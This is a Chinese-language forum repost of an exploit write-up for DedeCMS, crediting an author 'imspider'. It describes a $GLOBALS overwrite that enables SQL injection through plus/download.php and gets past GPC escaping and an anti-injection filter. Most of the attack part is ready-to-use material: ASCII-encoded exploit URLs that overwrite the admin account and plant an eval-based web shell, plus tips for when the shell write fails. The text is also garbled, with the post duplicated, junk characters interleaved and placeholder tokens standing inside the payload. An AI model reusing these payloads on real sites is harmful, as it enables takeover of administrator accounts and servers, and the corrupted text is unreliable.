|
|
此漏洞无视gpc转义,过80sec注入防御。
* t/ X/ r s# H" f补充下,不用担心后台找不到。这只是一个demo,都能修改任意数据库了,还怕拿不到SHELL?$ F+ p+ U& f8 \+ j8 t0 z4 f
起因是全局变量$GLOBALS可以被任意修改,随便看了下,漏洞一堆,我只找了一处。
5 d( \' k0 e: j- e7 [* t+ jinclude/dedesql.class.php
. O. M2 ?1 T' ~. }, Pif(isset($GLOBALS['arrs1'])){ $v1 = $v2 = ''; for($i=0;isset($arrs1[$i]);$i++) { $v1 .= chr($arrs1[$i]); } for($i=0;isset($arrs2[$i]);$i++) { $v2 .= chr($arrs2[$i]); //解码ascii } $GLOBALS[$v1] .= $v2; //注意这里不是覆盖,是+}function SetQuery($sql) { $prefix="#@__"; $sql = str_replace($prefix,$GLOBALS['cfg_dbprefix'],$sql); //看到这里无话可说,不明白为什么要这样做。 $this->queryString = $sql; }另外说下绕过80sec防注入的方法。
" F8 | v C7 k* P. D同一文件中,有两个执行SQL的函数。ExecuteNoneQuery和ExecuteNoneQuery21 v* U, C! r4 T
而用ExecuteNoneQuery2执行SQL并没有防注入,于是随便找个用ExecuteNoneQuery2执行的文件。: E, n6 \) c" c0 q5 r3 H
plus/download.php
7 X! T9 r2 |+ T( t( h& celse if($open==1){ $id = isset($id) && is_numeric($id) ? $id : 0; $link = base64_decode(urldecode($link)); $hash = md5($link);//这里的#@_是可以控制的 $rs = $dsql->ExecuteNoneQuery2("UPDATE `#@__downloads` SET downloads = downloads + 1 WHERE hash='$hash' "); if($rs <= 0) { $query = " INSERT INTO `#@__downloads`(`hash`,`id`,`downloads`) VALUES('$hash','$id',1); "; $dsql->ExecNoneQuery($query); } header("location link"); exit();}构造SQL语句 (提交的时候用ascii加密,程序会帮我们自动解密的,所以无视gpc):
& R, d3 ]. ^# ~ F1 Iadmin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #完整SQL语句:
5 y9 D* D: \3 ~* T, C( V; G* m! c* mUPDATE `dede_admin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #_downloads` SET downloads = downloads + 1 WHERE hash='$hash' EXP:
+ y6 O* U. V( R0 \# I. f4 Dhttp://localhost/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=115&arrs2[]=112&arrs2[]=105&arrs2[]=100&arrs2[]=101&arrs2[]=114&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35如果不出问题,后台登录用户spider密码admin% p, g3 @" ^4 w- q7 e3 E, K2 w( w6 @0 b
漏洞真的不止一处,各种包含,远程代码执行,很多,列位慢慢研究。% M# p( E4 X3 L7 W0 s: G+ c' ]
如果找不到后台,参见以前修改数据库直接拿SHELL的方法/ [7 y1 _) y e! E
UPDATE `dede_mytag` SET `normbody` = '{dede:php}file_put_contents(''spider.php'',''<!--?php eval(此漏洞无视gpc转义,过80sec注入防御。
% W; Z" o. ^' e3 j- Q6 }补充下,不用担心后台找不到。这只是一个demo,都能修改任意数据库了,还怕拿不到SHELL?( m/ P0 _9 [* \/ I2 H& G( j
起因是全局变量$GLOBALS可以被任意修改,随便看了下,漏洞一堆,我只找了一处。
7 C m6 c2 s! E( f- L9 z, winclude/dedesql.class.php
5 X2 {7 H s4 f1 I$ M! Kif(isset($GLOBALS['arrs1'])){ $v1 = $v2 = ''; for($i=0;isset($arrs1[$i]);$i++) { $v1 .= chr($arrs1[$i]); } for($i=0;isset($arrs2[$i]);$i++) { $v2 .= chr($arrs2[$i]); //解码ascii } $GLOBALS[$v1] .= $v2; //注意这里不是覆盖,是+}function SetQuery($sql) { $prefix="#@__"; $sql = str_replace($prefix,$GLOBALS['cfg_dbprefix'],$sql); //看到这里无话可说,不明白为什么要这样做。 $this->queryString = $sql; }另外说下绕过80sec防注入的方法。
4 v) X& }7 _$ l. E7 q) ~同一文件中,有两个执行SQL的函数。ExecuteNoneQuery和ExecuteNoneQuery2
" A* n0 l+ ~5 a0 F而用ExecuteNoneQuery2执行SQL并没有防注入,于是随便找个用ExecuteNoneQuery2执行的文件。
+ ?; I% B; g& n+ n( P( }9 U* s+ Dplus/download.php( k3 m6 V# @: n, q
else if($open==1){ $id = isset($id) && is_numeric($id) ? $id : 0; $link = base64_decode(urldecode($link)); $hash = md5($link);//这里的#@_是可以控制的 $rs = $dsql->ExecuteNoneQuery2("UPDATE `#@__downloads` SET downloads = downloads + 1 WHERE hash='$hash' "); if($rs <= 0) { $query = " INSERT INTO `#@__downloads`(`hash`,`id`,`downloads`) VALUES('$hash','$id',1); "; $dsql->ExecNoneQuery($query); } header("locationlink"); exit();}构造SQL语句 (提交的时候用ascii加密,程序会帮我们自动解密的,所以无视gpc):+ k: r6 K6 o& i3 k8 k
admin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #完整SQL语句:
) ~/ }5 u5 T3 D( K+ bUPDATE `dede_admin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #_downloads` SET downloads = downloads + 1 WHERE hash='$hash' EXP:4 ?6 s- p. y1 O5 J8 l
http://localhost/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=115&arrs2[]=112&arrs2[]=105&arrs2[]=100&arrs2[]=101&arrs2[]=114&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35如果不出问题,后台登录用户spider密码admin# p% N$ L7 l, U( K; K" u
漏洞真的不止一处,各种包含,远程代码执行,很多,列位慢慢研究。
( a3 o1 V( @. {) K- X. W如果找不到后台,参见以前修改数据库直接拿SHELL的方法
; E/ l' t3 X& b6 M& D8 a* N___FCKpd___6getshell:
, ^7 B! k+ w2 M$ V- t2 N: ?. Rhttp://localhost/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=120&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=109&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=32&arrs2[]=87&arrs2[]=72&arrs2[]=69&arrs2[]=82&arrs2[]=69&arrs2[]=32&arrs2[]=96&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35会在plus目录生成 x.php 密码 m1 r" y' N, S! L% w" }& S, `
http://127.0.0.1/plus/x.php( i, z' Q1 j; \9 I6 g- t/ U
update成功后还要访问下 /plus/mytag_js.php?aid=17 |# {+ s2 \) d0 J4 m
失败原因:
$ i' K3 ]+ i7 X z测试发现,如果aid为空或已经生成过一次,则会写shell失败….更改倒数第三个ascii改变改变aid(即&arrs2[]=49)0 g) D+ }& [4 z0 k y+ \
配图:
8 U" F1 J: i- o O* Y) |1.查看dede当前版本
% a, [3 d( z3 ]4 Z$ w9 L% j% ?% w* e& e0 ?/ a6 H6 Q
2.执行exp
$ V+ A+ v) w+ a' t3 C; g6 D& S( O
4 G$ J( T! Y) X' w4 M* khttp://www.myhack58.com/Article/UploadPic/2013-9/20139913327683.png3.测试登陆后台
0 h. T- |% y b' R, B4 ?* |
/ J0 E3 O# B. C0 ]' nspider密码admin( C, P6 H: M0 n+ w& ?
1 t H, ] Q9 whttp://www.myhack58.com/Article/UploadPic/2013-9/20139913327762.png
. \2 }" l4 g q7 `原作者:imspider3 j6 Y' @6 u9 Y
" A: d" Y6 c7 n, w1 Z2 W- l j, }; M7 r
本博客测试+配图+getshell
" P; T: g4 {: @5 F( qPOST[spider]);?-->'');{/dede:php}' WHERE `aid` =1 LIMIT 1 w( h( t1 s4 J( n4 N. E. j
5 [% S0 C, O+ D# c3 p& N" Z/ w8 N0 ngetshell: z5 N5 q9 ?4 z5 X* z) p( q
___FCKpd___7会在plus目录生成 x.php 密码 m B& z' U5 a" g0 ]
http://127.0.0.1/plus/x.php4 ]; T W( G& d
update成功后还要访问下 /plus/mytag_js.php?aid=1
; [% e$ s/ F2 h) U8 [7 U. @失败原因:
* w8 |7 O \: l/ ^测试发现,如果aid为空或已经生成过一次,则会写shell失败….更改倒数第三个ascii改变改变aid(即&arrs2[]=49)
4 h' ~, K- k( V, x; T配图:
* b6 t' T, T2 ^0 T1.查看dede当前版本4 D$ ?7 i& _! w4 \# Z1 n- }
http://www.myhack58.com/Article/UploadPic/2013-9/20139913326739.png% o% }: D# f1 p3 \
2.执行exp
4 E$ A" {0 v" o0 j% \" P5 thttp://www.myhack58.com/Article/UploadPic/2013-9/20139913327683.png3.测试登陆后台6 O; [0 Z/ h! O1 z+ T
spider密码admin
! \: `1 y% ~' g, hhttp://www.myhack58.com/Article/UploadPic/2013-9/20139913327762.png, U8 `( r7 r$ D% N! Y, {
0 m' j/ d6 s2 y+ Y$ M$ q! Q4 n5 ~
|
|
发表于 2013-9-21 16:08:21
收藏
支持
反对